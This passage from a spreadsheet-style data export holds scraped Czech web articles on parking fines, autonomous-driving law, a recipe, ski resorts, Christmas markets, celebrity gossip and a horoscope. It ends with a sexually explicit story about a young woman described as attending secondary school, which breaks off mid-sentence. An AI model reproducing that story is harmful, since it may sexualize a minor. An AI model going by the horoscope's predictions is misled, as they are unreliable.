parkoviště jsou zpravidla soukromých majitelů, kterým nic netušící řidiči vjedou na pozemek, čímž naruší jejich vlastnictví. S podobnými nekalými praktikami se teď setkali dokonce i na čerpací stanici. Co dělat, když se stanete jejich obětí? Pokuta přijde majiteli vozidla, nikoli řidiči, přímo do schránky. Poškozenými jsou často i čeští řidiči, a tak jsme se zeptali rakouského Spolkového ministerstva vnitra, jak je možné, že se soukromá osoba dostane k údajům o majiteli vozidla. Odpověď zněla takto: „Údaje o držiteli vozidla je možné získat, pokud existuje právní podezření, že došlo k narušení soukromého vlastnictví,“ odpověděli nám s tím, že orgánem odpovědným za poskytnutí těchto informací je buď okresní správní úřad nebo krajské policejní ředitelství. Řidičův chleba 5.0 Žádný telefon ani alkohol za volantem. Ministerstvo vysvětluje pravidla pro autonomní jízdu Číst článek #4: Autonomní řízení na českých silnicích „Nemůžeme být jakýmsi ostrůvkem, kde se nic neděje. Perspektiva je jednoznačně v autonomních systémech, a proto jim musíme jít naproti i legislativou,“ řekl Kupka novinářům s tím, že pomocí chystané novely zákona se podaří zlegalizovat fungování vozů na autonomní úrovni tři (viz tabulka pod článkem). V dalším volebním období se pak počítá i se čtvrtým a pátým levelem, i když to je ještě hudba budoucnosti. Zásadní je, že novela zákona, která by měla vstoupit v platnost od 1. ledna 2026, bude jasně definovat roli řidiče a jeho povinnosti. Pokud tedy předá řízení vozu, bude za případnou nehodu nebo porušení předpisů zodpovědný výrobce. Když ale vozidlo řidiče vyzve, aby řízení přezval, musí reagovat okamžitě. Pak už je odpovědnost na něm. EU vyžaduje minimálně 10 sekund na převzetí řízení. Řidičův chleba 4.7 Řidiči mířící do Rakouska by se měli připravit na ekologickou past. Jinak zaplatí přes 50 tisíc Číst článek #5: Vysoké pokuty, ale značka nikde Téma ekologických známek/plaket v kontextu Rakouska není nijak nové. První takové zóny byly zavedeny už před více než deseti lety. Jenže v současnosti se shodou okolností díky emisním předpisům a celkové politice EU může snadno stát, že na vás bude v Rakousku číhat poměrně drahá past. Důvody jsou dva. Ekologické zóny nejsou přímo na silnici nijak speciálně značeny a současně můžete jet v autě, kterého se povinnost mít ekologickou známku týká, ale snadno na to můžete zapomenout. O co tedy jde? Reklama Autor: Autosalon</t>
  </si>
  <si>
    <t>105270</t>
  </si>
  <si>
    <t>14970</t>
  </si>
  <si>
    <t>20241201_201_3475798310_d6c03b49c4b13ed45815.html</t>
  </si>
  <si>
    <t>d6c03b49c4b13ed45815</t>
  </si>
  <si>
    <t>Vepřová pečínka v alobalu! Tohle jídlo od Babici vás rozhodně nezklame</t>
  </si>
  <si>
    <t>Vepřová pečínka v alobalu! Tohle jídlo od Babici vás rozhodně nezklame Budu dělat vepřovou kotletu, která bude plněná cibulí a bude to taková křupavá vepřová pečínka a k tomu jihočeská lepenice. Lepenici my kuchaři známe, vy už někteří taky, ale je to jedna z mých nejmilovanějších příloh, která víceméně žádnou velkou práci nevyžaduje. A to my máme rádi. Tak hned začnu. Takže já jsem si nakrájel tady cibuli, vzal jsem si kotletku. Můžete samozřejmě ale použít i krkovici nebo plecko s kostí. Tu kost já využiju, aby mi to drželo pohromadě. Tak kolem té kostičky já si takhle říznu a udělám si tady takový základ. Toto nechám už držet, já to ukážu, tady si to jenom naříznu kolem té kosti a teďka si udělám takový centimetrový a zase nedořezávám, aby mi to drželo pěkně pohromadě. Kostičku, ta nám to vlastně drží. Když budete používat třeba plecko, tak to uděláte to samý, je to bez kosti, ale taky to bude držet. Musíte to pak třeba nějak spíchnout. Ta kotleta je hezká, ta hezky vypadá samozřejmě. Jo, je libová, takže to bude dobrý. Mezitím osolíme vevnitř pěkně, proto je to dobrý, že vlastně se to koření dostane do toho masa. Kmín, kmín máme my rádi Češi, k pivu se naprosto hodí, česneček taky tam dáme. Na plátečky nebo mačkaný, to je už čistě na vás. Česnekem taky nešetříme. Zase dáme mezi, takhle pěkně, prostě jsou to takový kapsy, spojená harmonička kapsová.Jirko, to jsi musel vymyslet ty, to jsem ještě nikde neviděl napsaný. To je tvůj nápad, viď? To je taková věc zajímavá. Teď hořčici do toho mázneme, zase jdeme takhle jedno po druhém. Ne, na té straně, to ne, to by se nám spálilo. Česká klasická polotučná, nic, žádný výmysly. K tomu pivu by se ani žádná jiná podle mého nehodila. Teď co tady ještě mám? Papriku červenou. Sladkou nebo pálivou?Já dávám sladkou, tam si myslím, že tam vlastně ta pálivost tady u toho jídla je podle mého zbytečná. A teďka vezmu trošku tady mám zelené petrželky. Klasická listová. Klasická, plochá a tu já dám tady k té kosti, to tam nacpu a ta nám zase provoní to maso z té strany. Samozřejmě pustí trochu vody, že se to bude dobře dělat.Tam mám vlastně to pivo . Teďka ještě to osolím takhle ze shora trošku, zase okmínuju. Tak teďka samozřejmě máme několik možností, můžete to třeba dát tam tu cibuli, spíchnout, dát do pekáčku, ale daleko lepší bude použít alobal, který já tady mám. Já tomu říkám tzv. mobilní hrnec.Prostě uděláte si víc vrstev alobalu, dáte to maso dovnitř. Takže v podstatě s tím pak můžete jít třeba, když to zabalíte celé do ohně a podobně, podle toho, kde to děláte. A teď si sem vezmu tu cibuli a tou cibulí to teda obložím. S tou nešetřím.Klidně dovnitř, takhle pěkně tam nacpeme. Samozřejmě potom, až to bude v té troubě, tak ta cibule nám pustí tu šťávu úžasnou. Takže dochutí to maso. Prostě s tím absolutně nešetříme, prostě je to taková cibulovo vepřová pečínka. Takhle okolo pěkně a teď už stačí pouze vzít ty rohy a takhle to celé pořádně stiskneme.A Jirko, já už vařím nějaký rok a toto jsem ještě neviděl. Tak to je dobře.Mně se to líbí. Kvůli tomu já s tebou strašně rád vařím, protože já tě strašně rád překvapuju. Pivo dvanáctku nebo desítku? Toto je dvanáctka.Všem známá dvanáctka. Zase to nepřeháníme, aby se nám to neuvařilo. Dáme takhle, jak to je, do toho pekáčku. Samozřejmě desítku necháme horníkům po práci, viď? Občas se na to podíváme. Nejdřív bych to dal na 200, na 15 minut, potom stáhneme na nějakých 170. Necháme to dojít, občas se na to podíváme. Je to pro kolik? Čtyři lidi se dobře najedí? Určitě. Mám tady domácí svoje škvarkový sádlo, to se mi do té lepenice vždycky líbí, že to i křupne. A to většinou všichni doma mají nebo si ho udělají. Takže trošku necháme rozpustit. Přidáme tam tu cibulku. Je to víceméně velmi jednoduché. Samozřejmě musíte mít uvařený a rozšťouchaný brambory. To já mám.A teďka máte dvě možnosti. Buď tam dáte to zelí teď hned, ale já nejdřív ohřeju ty brambory. Vždycky v tom sádle s těma škvarkama a nakonec přidáme zelí. Můžete ho i přesekat, je to zelí kysané, dávám to bez té vody. Teďka to všechno promítáme dohromady a máte vynikající lepenici hotovou, ještě ochutnáme, jestli je dostatečně slaná. A co je lepenice? Zelí zatažené bramborami vařenými? Přesně tak.Cibulka, pepř, kmín, kdo jak si udělá. To vypadá bombově. Já ještě ochutnám, jestli teda. Já ochutnám taky.A ještě tady mám teda na konci trošku smažené cibulky, a tu si já nechám ještě na ozdobu. Ale můžeme ji tam vmíchat. Promícháme, můžeme vypnout. Tak lepenici máme hotovou, talíř je připraven, jdeme dolů.Jirko, já už se těším teda. Jdeme do masa.To jsou jídla, který patří do Čech kamaráde. Vypadá to úžasně, Jiří. Tak takhle vypadá to masíčko. Jirko, na to já se úplně těším, protože to bude úplně měkoučký samozřejmě a přímo to láká.Tak já ti pomůžu, můžu? Jestli chceš, tak mi můžeš pomoct. Jdeme na to, ty to budeš porcovat nějak nebo to chceš dát celé ven? Takhle celý to tam dej i s tou kostí. Na ten talíř jdeme, jo? Podívej se, to je úžasný, kamaráde. To je servis. My si uděláme tady.Samozřejmě víme, že to je 4, 5 lidí jídlo. To není pro jednoho ten talíř, rozumíš? Někdo by to snědl i sám. My si s tím taky poradíme, že jo? Lepenice voní úžasně taky. Tak takhle lepenici. Teďka tady máme samozřejmě ten susek. Bacha nespal se, je to vařící. Je to horký, přátelé, horký. Přelít samozřejmě, protože tam jsou samý dobrý věci, tam není nic špatnýho. A tady vidíte, že můžu být luxusní papiňáky, tlakové hrnce a Jirka to zvládl z alobalu za 5 Kč, stejný recept. Tady máte smažený česnek a cibulku na ozdobu. Trošku kmínku můžete dát okolo ještě. Českého kmínu, Jirko. Český kmín samozřejmě od Brna . A mám tady ještě smaženou cibulku, kterou to takhle hezky ještě pokapeme. Co tady ještě mám dál?Přímo z krbu ještě papričky takhle. Pokud se vám moje videa líbí, klikněte na odebírat, uděláte mi tím radost. Vepřové maso pečené v alobalu s jihočeskou lepenicí je úžasný voňavý recept, který vás rozhodně nezklame. Pořad: Babicova televize</t>
  </si>
  <si>
    <t>20241201_202_3475665369_2d506d9a9850e46471f7.html</t>
  </si>
  <si>
    <t>2d506d9a9850e46471f7</t>
  </si>
  <si>
    <t>Blízký východ jako lyžařská destinace? Rozhodně ano</t>
  </si>
  <si>
    <t>Blízký východ jako lyžařská destinace? Rozhodně ano Oblast Blízkého východu je jednou z nejzajímavějších cestovatelských destinací. Výlety za historií nebo koupáním proto nikoho nepřekvapí. Ale za lyžováním? Ano, i zde se dá lyžovat. Kam na lyže? Na Blízkém východě je možné lyžovat na několika různých místech. Nemáme teď na mysli dubajskou sjezdovku centra Mall of the Emirates, nýbrž skutečné lyžařské resorty se vším všudy. Vyrazit za sněhem a lyžováním můžete především do Libanonu a do Izraele . V obou místech jde o velmi silný zážitek. Lyžování v takto exotických destinacích je skvělé právě proto, že jej můžete zkombinovat s dalšími aktivitami, které jsou specifické pro tato místa plná historie. Spíše než pohled na zasněžené hory vyvolává představu písečných dun, které mění svůj tvar. Existuje zde však i jiný druh oáz – těch, které nabízejí nečekané zimní zázraky. Mount Hermon, Izrael Jediné zimní lyžařské středisko na území Izraele se nachází na jižním svahu hory Hermon (2040 metrů) v oblasi Golanských výšin. Navzdory nepřátelským politickým vztahům mezi Izraelem s Libanonem a Sýrií je Mount Hermon dobře prosperujícím střediskem . Celkem je zde 14 sjezdovek, 11 lanovek a lyžařská škola. Nabízí se zde ale také spousta aktivit pro nelyžaře – mezi hlavní hity patří sáňkování a tubing. Dát si zde můžete vyhlášené svařené víno nebo něco z nabídky několika košer kaváren. Po lyžování se můžete vydat na návštěvu do nedalekého archeologického naleziště Rujm el-Hiri. Mezi Izraelci je lyžování překvapivě velmi oblíbené, a protože sezóna zde trvá jen od poloviny prosince do poloviny března, bývá zde velmi plno. Středisko Cedars, Libanon Lyžařského středisko Cedars je nejstarším lyžařským areálem v Libanonu . Bylo založeno francouzskou armádou ve 30. letech 20. století, v roce 2005 pak bylo rekonstruováno. Středisko je určeno především začátečníkům , protože má mírné svahy. Běžkaři zde pak najdou nejlépe udržované tratě v zemi. Nedaleko se nachází les známý jako Cedars of God, který je zapsán na seznamu světového dědictví UNESCO . Roste v něm vzácný cedr libanonský, některé stromy jsou zde staré až 2 000 let. Aktuálně lyžování příliš nepřeje konflikt Libanonu s Izraelem , v dlouhodobějším horizontu se ale snad brzy stanou sjezdovky v Libanonu opět vyhledávaným cílem lyžařů toužících po netradičních zážitcích. Oukaïmeden, Maroko Oukaïmeden se nachází pouhých 50 mil od Marrákeše a nabídne vám poněkud netypický obrázek Maroka . Nejde sice o Blízký východ , nýbrž severní Afriku , ale to na principech věci nemění. Tato na první pohled ospalá vesnička se nachází ve výšce téměř 2 500 metrů v pohoří Vysoký Atlas. Lyžařské vleky vás zde vytáhnou na vrchol hory Jebel Attar o dalších asi 600 metrů výše. To jí vyneslo titul nejvýše položeného lyžařského střediska v Africe . Oukaïmeden má veškeré zázemí klasického evropského střediska , jen je to celé trochu retro. Lyžařům zde slouží jedna sedačková lanovka, která obsluhuje 20 spíše kratších tratí. I tak je ale lyžování v Libanonu velký zážitek. Zdroje informací: https://robbreport.com/travel/destinations/best-places-ski-middle-east-2835886/ https://radiozurnal.rozhlas.cz/vyrazte-za-snehem-do-libanonu-je-ho-tam-ted-vic-nez-na-ceskych-sjezdovkach-radi-8143339 https://www.euro.cz/clanky/na-lyze-do-pouste-zeme-blizkeho-vychodu-lakaji-turisty-na-horska-strediska-i-kryte-svahy/</t>
  </si>
  <si>
    <t>20241201_203_3475658199_e2d02e1dafd2a6e7da3b.html</t>
  </si>
  <si>
    <t>e2d02e1dafd2a6e7da3b</t>
  </si>
  <si>
    <t>Neděle 01.12.2024: Den plný výzev pro Býky, Raky, Panny a Střelce</t>
  </si>
  <si>
    <t>Neděle 01.12.2024: Den plný výzev pro Býky, Raky, Panny a Střelce Neděle je obvykle spojována s odpočinkem a příjemně stráveným časem, ale pro některá znamení zvěrokruhu může být také dnem plným nečekaných komplikací. Přílišná relaxace nebo unáhlené jednání mohou způsobit zbytečné potíže. Pokud patříte mezi Býky, Raky, Panny nebo Střelce, buďte v tento den obzvlášť opatrní. Předchozí Další 1. Býk: Pozor na přemíru požitků Býci jsou známí svou láskou k dobrému jídlu, pití a pohodlí. Neděle však může být dnem, kdy tyto radosti přerostou v problémy. Nadměrná konzumace jídla nebo alkoholu by mohla vést ke zdravotním komplikacím nebo hádkám s blízkými. Tvrdohlavost, která je Býkům vlastní, může přidat na napětí. Zkuste být umírněnější a vyhněte se konfliktům, aby váš den zůstal příjemný. Autor: - || jdavid || | || | | jdavid | -</t>
  </si>
  <si>
    <t>17570</t>
  </si>
  <si>
    <t>12940</t>
  </si>
  <si>
    <t>20241201_204_3475657808_f650873c8ad1c293455c.html</t>
  </si>
  <si>
    <t>f650873c8ad1c293455c</t>
  </si>
  <si>
    <t>Výlet</t>
  </si>
  <si>
    <t>Výlet Vlak vezl výletníky. Většina výletníku vyslechla veselé, veskrze vymyšlené vyprávění vlakvedoucího. Vlak vezl výletníky. Většina výletníku vyslechla veselé, veskrze vymyšlené vyprávění vlakvedoucího. Vibrace výhybky vykolejila vlak. Vlakvedoucí velel- vystupovat. Všichni vylezli. Viděli vzdálené vrcholky. Ve výhledu vadila vysoká věž. Vál východní vítr. Výprava vyrazila. Všímavý venkovan výletníkům vnutil vadné výrobky. Viděli vodu. Velký vodopád vytvářel vodní víry. Vodu vířila vydra. Vyplašený výr velký vzlétl vodorovně vzhůru. Vůdce výletníků velel- vychladnout, vysvléct, vykoupat. Vystrčili vnady. Vlažná voda všechny výborně vzpružila. Vycházka vygradovala. Vrchol vyhlídky vyzdobili vztyčením vlajky. Vypili všechnu vlastní vlažnou vodu. Vyhladovělí vytáhli voňavé vdolky, vánočky, vařené vuřty, vypražená vajíčka, vitamíny. Vykulený vnuk vůdce výpravy viděl ve vdolku vosu, vyskočil, vdolek vyplivl. Vyplašená vosa vzlétla. Vrabci vyzobávali vyvrácenou, vysokou, vykotlanou vrbu. Vandalové večer vybrali včelám vosk. Včely výstražně vrčely. Vyrazily vetřelce vystrašit, vyprovokovaly válku. Výletníci vzdorovali. Vzápětí všechny vylekalo vzdálené vití vlků. Vůdce vznik vytí vysvětlil – vytí vytvořil vítr. Včas vyrazili vstříc večernímu vlaku. Vydařený výlet vyvrcholil večeří – vepřovými výpečky, výborným vínem .</t>
  </si>
  <si>
    <t>20241201_205_3475673126_0827cb959d85adcc9656.html</t>
  </si>
  <si>
    <t>0827cb959d85adcc9656</t>
  </si>
  <si>
    <t>Svařák za 100 Kč, langoš za 220 Kč a davy lidí k tomu. Na Staroměstském náměstí začaly vánoční trhy</t>
  </si>
  <si>
    <t>Svařák za 100 Kč, langoš za 220 Kč a davy lidí k tomu. Na Staroměstském náměstí začaly vánoční trhy Rozsvícením vánočního stromu včera oficiálně začaly vánoční trhy na Staroměstském náměstí . Vánoční trhy na Staroměstském náměstí odstartovaly 30. listopadu. Stánků je zde jako každým rokem spousta a návštěvníků velké množství. Trhy budou probíhat do šestého ledna. Zdroj: Lukáš Dittrich, Fotrnatripu.tv Vánoční trhy na Staroměstském náměstí probíhají od 30. listopadu do 6. ledna. Otevřeno je od deseti ráno do deseti večer. Na návštěvníky kromě svařáku, piva a nejrůznějšího jídla čeká také doprovodný program. Včera oficiálně odstartovaly pražské vánoční trhy. Na Staroměstském náměstí byl rozsvícen vánoční strom. Tahle akce přitáhla takové množství lidí, že policie musela náměstí uzavřít a další zájemce tam přestala pouštět. Tak jako každý rok mohou návštěvníci na vánočních trzích zakoupit všemožná jídla, pití, ale také různé suvenýry. Kdo chce ovšem nasát tu správnou vánoční atmosféru, která je alespoň trochu klidná, ten by se měl Staroměstskému náměstí obloukem vyhnout. Jak to letos na Staroměstském náměstí vypadá, na to jsme se byli v sobotu odpoledne podívat a přitom jsme pořídili také řadu fotek. Ty najdete v přiložené galerii: Galerie: Vánoční trhy na Staroměstském náměstí vstoupit do galerie Vánoční trhy 2024 v Praze i jinde v ČR Pokud nechcete vyrazit na Staroměstské náměstí , můžete i jinam. V Praze se koná řada trhů. A spoustu dalších najdete i v jiných městech. Přehled vánočních trhů a termíny jejich konání najdete v našem starším článku Vánoční trhy 2024, místa a termíny: Nuda v Praze , lepší trhy pořádají v Brně . Bohatý výběr, bohatý program, vyšší ceny Trhy na Staroměstském náměstí nabízí bohatý výběr nejrůznějších pochutin. Dát si můžete třeba pečené kaštany, plněné knedlíky, trdelníky, grilované maso, klobásy nebo dokonce šneky a ústřice. Zapít to můžete klasickými nápoji včetně svařáku, piva , kávy a tak podobně. Kde je jaký stánek, to ukazují mapky rozmístěné na náměstí. Ceny jsou samozřejmě vyšší, což asi těžko někoho může překvapit vzhledem k tomu, že jde o vyhlášené vánoční trhy v samém srdci Prahy . Pro představu, za čtyři deci piva dají návštěvníci 80 Kč, dvojka svařáku vyjde na 100 Kč, 100 g kaštanů stojí 140 Kč, trdelník 100 až 130 Kč, klobása v bagetě 150 Kč a langoš až 220 Kč. Ceny jsou u všech stánků stejné. Uprostřed náměstí je pak vyhlídková plošina, ze které si můžete vyfotit davy pod sebou. Kromě jídla se zde prodávají i nejrůznější suvenýry, ať už to jsou třeba perníky, nebo dřevěné drobnosti či předměty s tématikou Prahy . Na každý den je naplánovaný doprovodný program, který probíhá tradičně na zdejším podiu. Co přesně se koná ten který den, to najdete na oficiálních stránkách pražských trhů. Trhy v centru Prahy lákají hlavně turisty, i proto tu je tolik lidí. Další velké trhy se konají na Václavském náměstí . Menší vánoční trhy ale lze navštívit všude možně po Praze . Mnohdy jsou hezčí a mají i více vánoční atmosféru. Zdroj: autorský text Autor: Lukáš Dittrich Autor person Lukáš Dittrich Rubrika transition_slide Novinky</t>
  </si>
  <si>
    <t>7340</t>
  </si>
  <si>
    <t>9010</t>
  </si>
  <si>
    <t>20241201_206_3475651776_1ca0063bf3d35f40c70e.html</t>
  </si>
  <si>
    <t>1ca0063bf3d35f40c70e</t>
  </si>
  <si>
    <t>Adventní trhy, které musíte vidět. Paříž v hávu luxusu, Německo má nejstarší trh, Rakousko je pohádka</t>
  </si>
  <si>
    <t>Adventní trhy, které musíte vidět. Paříž v hávu luxusu, Německo má nejstarší trh, Rakousko je pohádka Je ještě dost času, než se uvelebíte s mísou salátu před televizí, v níž bude na Juráškovi cválat Popelka. Ještě několik dní uběhne, než si připomenete, co je to za máničku na nástěnce rodiny Peškových v Pelíšcích. Možná si naopak potřebujete odpočinout od několikátého plechu cukroví, zdobení, uklízení a shánění dárků. Vydejte se alespoň na den na adventní trhy k sousedům bližším i vzdálenějším a přivezte si kousek jejich vánočního kouzla k vám domů. Zdroj: Youtube Největší trhy? V Německu mají několik nej Drážďany jsou pro nás tradicí a nejspíš jste tam v čase předvánočním již někdy zavítali. Lákají nejen obchodními domy, ale i mnohem zdobnějšími trhy, kdy stánky jsou v podobě chaloupek jako pocukrovaných sněhem. Za návštěvu stojí rozhodně Striezelmarkt, což je nejstarší německý vánoční trh . Pořídit si zde můžete tradiční lužické modrotisky a ochranovské hvězdy. Dobrý vibe má i Prager Straße či Neumarkt. Chcete nasát atmosféru ve vánočním zážitkovém městečku? Zajeďte k parku Großer Garten. Největšími trhy se chlubí Norimberk , kdy jen v centru města najdete více než 200 stánků. Děti nadchne speciální dětský vánoční trh na náměstí Hanse Sachse , kde mohou poslat dopis Ježíškovi. Dospělé na tradičních trzích potěší dobroty jako tenké norimberské klobásky či bramboráky s jablečným pyré. Za zmínku stojí i trh Christkind, kde si můžete dát teplý vaječňák. A co německá metropole? Zajeďte si do Mnichova a ochutnejte „jejich“ Feuerzangenbowle, tedy červené svařené víno s příchutí zkaramelizovaného cukru. Největší kouzlo Vánoc? V Rakousku Rakousko má komornější, přesto velmi kouzelnou atmosféru, bližší našim městům. Vídeň je zvláště magická, blízce připomíná Prahu , ovšem i zde, stejně jako v Drážďanech , je vánoční atmosféra opulentnější. Krásné jsou trhy na náměstí Rathausplatz. Dýchne na vás pohádkové mámení, když se projedete kočárem taženým koňmi. Doporučujeme navštívit také zámek Mirabell . A jestli jste lyžaři a chystáte zimní dovolenou, vánoční Salzburg je skvělá volba. Co je větší pohádkou, než hory a chaloupky pokryté pravým sněhem, to vše nasvícené barevnými světélky? A i ten Santa se tu najde. Nejkrásnější trhy? V Paříži Centrum módy se umí obléknout i do vánočních outfitů. A jak jinak než se vkusem! Nečekejte přeslazené výzdoby, směsice barev, Paříž je skvostná. Champs - Élysées ozdobí dřevěné stánky, které nasvítí žárovky. Až se tu budete procházet, můžete zabloudit do některé z vánočních vesniček, ochutnat svařené víno , horkou čokoládu, tartiflette či tradiční žampiony na smetaně. U katedrály Notre-Dame nesmí chybět nádherný strom. Francouzskou metropolí se budete kochat v noci i ve dne. Nezapomeňte podniknout shopping, při kterém vás vánoční nálada taktéž obejme. Jak slaví Vánoce bratia? Jestli vás lákají tradice bližší těm našim, můžete vyrazit na Slovensko . V srdci Bratislavy najdete trhy, kde si dáte svařák, grog, k jídlu pak tradiční plněné lokše. Proslulé jsou i trhy v Trnavě , Nitře a magická je atmosféra hradu v Trenčíně . Zde vystoupí folklórní soubory dospělých i dětí, nádherný je také zdejší betlém. Tajný tip? Polsko a jeho největší náměstí Naši severní sousedé mají stále vymakanější turistické destinace a v čase adventu to platí dvojnásob. Samotná metropole Varšava se rozzáří tisíci světélky, stánky a kluzišti. Skvostné jsou svátky ve Vratislavi. Na zdejším Rynku, což je největší evropské středověké náměstí, se tu odehrávají opravdu velmi tradiční trhy, takže vplujete i do historie. Mají tu mimochodem skvělý vánoční punč, ochutnejte i grilovaný sýr s brusinkovou zavařeninou. Highlightem polské turistiky je Krakov , trhy tu mají opravdu velkou tradici. Doporučujeme dát si místní specialitku – pitný med. Jaké adventní trhy vás lákají nejvíce? Ty německé. Chci vidět to největší! 14 % Rakouské. Víc mi připomenou domov. 7 % Toužím poznat vánoční Paříž ! 25 % Jestli je Polsko skrytý turistický skvost, jedu tam. 45 % Na Slovensku mi to vyhovuje, vždyť jsou nám nejblíže. 9 % Hlasovalo: 56 Zdroje: iGlanc.cz , On the Luce travel blog , Christmas Garden , Dresden Magazin , Culture , Time and Date , Tyrol , Svet stromčekov , Domalenka Feel good studio / Shutterstock</t>
  </si>
  <si>
    <t>76880</t>
  </si>
  <si>
    <t>49180</t>
  </si>
  <si>
    <t>20241201_207_3475726572_4b2df642ecb9a8beb8cf.html</t>
  </si>
  <si>
    <t>4b2df642ecb9a8beb8cf</t>
  </si>
  <si>
    <t>Rozvod kvůli milence? Manžel Krainové dostal nůž na krk</t>
  </si>
  <si>
    <t>Rozvod kvůli milence? Manžel Krainové dostal nůž na krk „Cvičí už víc než já.Tak jsem se ho rovnou zeptala, jestli nemá milenku nebo co se vlastně děje," pronesla Krainová na adresu o tři roky mladšího manžela. Nečekaná změna Karlova životního stylu je totiž opravdu podezřelá! Zcela přestal požívat alkohol a na talíř si odmítá nakládat jakékoliv přílohy. Navíc ještě běhá a tráví spoustu času ve fitku. Není proto divu, že už shodil víc jak deset kilo. Manžel Simony Krainové zhubl 15 kilo! Dostal nůž na krk Jak tedy Vágner na přímý dotaz ohledně existence případné milenky reagoval? „Prý ne. On by mi to přiznal, my před sebou žádná tabu nemáme. Přešla bych to. Přece se nebudu rozcházet s manželem po patnácti letech, jenom proto, že má milenku!“ překvapuje svou tolerantností jednapadesátiletá Simona na iDnes.cz. Simona Krainová prozradila detaily o svatbě: Markéta Reinischová, Aleš Brunclík Manžel Simony Krainové zhubl 15 kilo! Dostal nůž na krk Simona Krainová se bude opět vdávat! Prozradila detaily Blesk:CNC / David Kundrát Pavel Machan Marek Pátek Martin Hykl Blesk:Foto CNC: Marek Pátek archiv Blesku Instagram Pavel Machan, Marek Pátek, Martin Hykl, David Kundrát Blesk:Martin HyklCzech News Center Foto Instagram.com Dieta/ Lucie Robinson Marek Pátek Blesk:Kundrát, Hykl Foto Aha! – David Kundrát, Instagram.com Simona Krainová a Karel Vágner Slavnostní otevření Máje: Simona Krainová a Karel Vágner Simona Krainová a její manžel Karel Vágner ml. Simona Krainová s manželem Karlem Vágnerem a syny Maxem a Brunem a nevlastním Karlem na Maledivách . Karel Vágner Simona Krainová Simona Krainová a Karel Vágner ml. UniCredit Party 2023: Red carpet nejluxusnější party Varů Simona Krainová se synem Modelka na ostrově dodržuje přísný stravovací režim, jde jí to ale s úsměvem. Karel Vágner ml. upravoval své ženě Simoně Krainové prsa Simona Krainová s manželem Karlem Vágnerem Moët party ve Varech: Karel Vágner a Simona Krainová Moët party ve Varech: Simona Krainová Moët party ve Varech: Simona Krainová a Karel Vágner Pár hodin na to ale radši zveřejnil fotku se Simonou . Podnikatel ji neváhal chytit kolem pasu. Autor: rž Autor person rž Rubrika transition_slide Žhavé drby</t>
  </si>
  <si>
    <t>269260</t>
  </si>
  <si>
    <t>104660</t>
  </si>
  <si>
    <t>20241201_208_3475568706_e78c42c5e9274d36d877.html</t>
  </si>
  <si>
    <t>e78c42c5e9274d36d877</t>
  </si>
  <si>
    <t>Panic</t>
  </si>
  <si>
    <t>Panic 1. 12. 2024 Všude kolem nich byly stoly i zem pod kaštany plné zlatých táců, talířů i mincí, jak slunce probleskovalo přes rozložité staré koruny. Hosté usrkávali ledové pivo , do kterého jim lezly ožralé vosy, a u zdi nervózně střihal ušima vypelichaný pes. Hovor dále probíhal podle osvědčeného scénáře, David si ho přátelsky dobíral kvůli děvčatům, až nakonec dospěli k bodu, kdy přišla na řadu Janova amatérská porno povídka „Jak nezkušené tele o panictví přišlo,“ o kterou Davida už posté nemohl připravit. Chvilku se sice bránil, protože nechtěl tu trapnost připomínat, ale věděl, že mu odpor dlouho nevydrží. Naštěstí v problematice panictví už má tedy chválabohu splněno. „Ještě nikdy jsi mi, Honzo, neřekl, jak jste se s tou blahoslavenou Klárou vlastně seznámili?“ „To nestojí za řeč, bylo jí smutno, možná z nějakého rozchodu, pozval jsem ji na dvojku, ona něco říkala, ale já neposlouchal a jen hltal její veliké faraonsky nalíčené oči, plné vlhké rty, klenbu vyzývavého poprsí a celou tu erotickou energii, která z ní sálala. Po pár setkáních už jsme vibrovali stejným kmitočtem, a kdyby to šlo, byli bychom na sebe skočili třebas přes stůl. Tím končily přípravné práce a začaly logisticko-organizační problémy. Dojížděla na střední do Ostravy až někde ze Suchdola . A tak dál, už to přece znáš…“ „No dovol, ještě ses nedostal ani do předpeklí, dej si panáka na zdraví a nic nevynechávej!“ protestoval dotčeně David. „Klára musela stíhat spoje a otec ji ukrutně hlídal, nejspíš dobře věděl, proč. Určitě si však sám matně vzpomínáš, že nic není tak vynalézavé jako pohlaví, které zavětří sebemenší šanci k seberealizaci. Když to začalo mezi námi jiskřit jak jističe v atomové elektrárně a moje DNA se přetavila ze šroubovice na ocelové kopí, propukly přípravy delší a složitější než invaze v den Dé. Pomohl nám elektrikářský fond na utužování socialistického kolektivu na huti, z něhož se jednou za rok financovaly slavné vepřové hody, na kterých se všichni k prasknutí najedí a jak zákon káže i ožerou. Znáš Orlovou ? Strašná díra, to vezmeš nic, dělíš to stem, jeden dílek hodíš do kyseliny sírové, a co zbyde, je Orlová .“ Takže Orlová Neorlová, hrdličkám to bylo jedno, on viděl jen Klárku, byla oblá a plná, až ho bolelo ve slabinách, chlapi na ni taky civěli, zatímco jim manželky svědomitě okopávaly holenní kosti. Ovšem stoly se jídlem prohýbaly až na zem, ovarové hlavy se na nich zachvívaly sulcem i při kýchnutí, křen vháněl do očí slzy již ze dvou metrů, z horkých jitrnic a jelit se kouřilo, ve velkém hrnci voněla majoránkou a čerstvě utřeným česnekem prdelačka a na velkých tácech se leskla tlustá kola tlačenky, posypané cibulkou, pepřem a dochucené trochou bzeneckého octa. Hora zlatavých řízků pak vypadala jak humanitární pomoc Africe a vepřová pečeně v pekáčích křupala v zubech, až se jedlíkům dělalo slabo. Protože se pivo čepovalo v samoobslužném režimu, několik mužů se chystalo u pípy kempovat. Zemský ráj to na pohled. Ale on s Klárkou jen zobali jak vrabci u krmítka a chtěli být sami. Když nastoupila na malé pódium skupinka tří hudebních sebevrahů a snažila se bubnem, harmonikou a trumpetou imitovat symfonický ansámbl, jejich rozhovor v hluku začal váznout a měnit se v posunkovou řeč. Raději šli tančit a on se dmul pýchou, když cítil stoupající závist chlapů kolem, protože i tenkrát definoval kvalitu muže průsečík značky auta a vyvolávací ceny jeho partnerky. U ploužáku se k sobě chtivě přitiskli, Klára mu zasunula nohu do rozkroku a třela klín o jeho stehno jak holič břitvu o brusný řemen. Vychutnávala si, co všechno její tělo dokáže s mužem udělat a navrch mu přitiskla na hruď i svoje velká tvrdá prsa. Když jí pak pod stolem zajel rukou pod sukni, až kam to šlo, a ona mu to vrátila, věděli, že čtyřhodinovou přípravu už nevydrží protahovat, a zmizeli. Celou cestu na nádraží i ve vlaku se urputně líbali a přestali, jen když se začali dusit. Za oknem vagónu se míhala noc, v kupé byli naštěstí sami, a tak bez ostychu splynuli v jednu propletenou vánočku. Průvodčí byl evidentně zvyklý. Sotva se za ním zavřela dvířka kupé, nemohl už Jan více vydrážděnosti snést. Zoufale se pokoušel dostat dovnitř přes šaty se zipem vzadu, ale bylo to možné jen, kdyby 